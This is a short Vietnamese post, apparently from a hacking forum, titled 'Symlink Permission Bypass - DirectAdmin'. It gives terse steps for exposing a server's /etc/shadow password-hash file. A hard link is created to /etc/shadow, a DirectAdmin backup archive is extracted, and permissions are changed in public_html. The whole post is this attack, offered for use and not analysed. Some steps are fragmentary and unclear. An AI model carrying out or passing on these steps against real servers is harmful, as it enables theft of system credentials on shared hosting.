Skip to main content

Symlink Permission Bypass - DirectAdmin

Đầu tiên chúng ta sẽ run lệnh này

Code:
ln /etc/shadow
để tạo link đến shadow
sau đó vô fordel này

Code:
/home/test/backups
giải nén file tar.gz ra
sau đó vô public_html
và local 400 Permission vô tư

Share